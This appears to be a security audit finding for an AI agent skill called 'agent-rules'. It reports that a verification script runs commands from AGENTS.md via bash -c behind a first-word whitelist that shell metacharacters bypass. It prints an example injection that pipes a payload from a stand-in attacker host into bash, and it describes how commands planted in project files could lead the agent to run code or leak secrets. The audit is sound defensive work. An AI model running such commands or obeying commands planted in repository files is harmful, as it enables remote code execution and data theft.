agent-rules
Warn
Audited by Gen Agent Trust Hub on Jun 18, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATION
Full Analysis
- [COMMAND_EXECUTION]: The script
scripts/verify-commands.shis designed to verify that documented commands inAGENTS.mdare valid by executing them viabash -c. This creates a direct execution path for any string found in the project's documentation sections. - [REMOTE_CODE_EXECUTION]: The
is_safe_commandvalidation function inscripts/verify-commands.shuses a whitelist approach that only inspects the first word of a command. It permits powerful tools such ascurl,wget,docker, and various language runtimes. Because it does not sanitize the rest of the command string, an attacker can use shell metacharacters like;,|, or&&to bypass the whitelist and execute arbitrary code (e.g.,ls; curl http://attacker.com/payload | bash). - [DATA_EXFILTRATION]: The inclusion of
curlandwgetin the verification whitelist allows the agent to unknowingly send sensitive project information or environment variables to external servers if a malicious command is embedded in the project's configuration files. - [COMMAND_EXECUTION]: The skill's primary workflow involves running several Bash scripts that interact with the local filesystem and execute build tools (e.g.,
go,npm,composer) based on the contents of untrusted project files, which is a significant attack surface if the repository being audited is compromised.
Audit Metadata